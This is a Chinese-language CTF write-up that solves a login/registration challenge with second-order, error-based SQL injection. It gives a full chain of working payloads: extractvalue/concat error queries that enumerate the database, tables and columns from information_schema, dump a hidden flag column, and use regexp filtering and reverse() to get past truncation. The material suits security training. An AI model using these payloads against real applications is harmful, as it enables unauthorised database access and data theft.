目录

获取数据库名

获取表名

获取flag表中的字段名

获取flag字段中的字段值，发现flag并不在这

获取users表中的字段名

获取real_flag_1s_here字段中的字段值,发现被隐藏

采用正则绕过方法，查看flag，发现缺少一部分

反向输出flag

---

        根据题目发现是一个登录注册界面，估计是二次注入，注册一个带有”的账号，发现报错，那么采用报错注入来获取flag

获取数据库名

命令：1"&&(extractvalue(1,concat(1,(select(database())))))#

 

 

获取表名

命令：1"&&(extractvalue(1,concat(1,(select(group_concat(table_name))from(information_schema.tables)where(table_schema="web_sqli")))))#

 

获取flag表中的字段名

命令：1"&&(extractvalue(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')))))#

 

 

获取flag字段中的字段值，发现flag并不在这

命令：1"&&(extractvalue(1,concat(1,(select(group_concat(flag))from(flag)))))#

获取users表中的字段名

命令：1"&&(extractvalue(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')))))#

 

 

获取real_flag_1s_here字段中的字段值,发现被隐藏

命令：1"&&(extractvalue(1,concat(1,(select(group_concat(real_flag_1s_here))from(users)))))#

 

 

采用正则绕过方法，查看flag，发现缺少一部分

命令：1"&&(extractvalue(1,concat(1,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^P')))))#

 

反向输出flag

命令：1"&&(extractvalue(1,concat(1,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^P'))))))#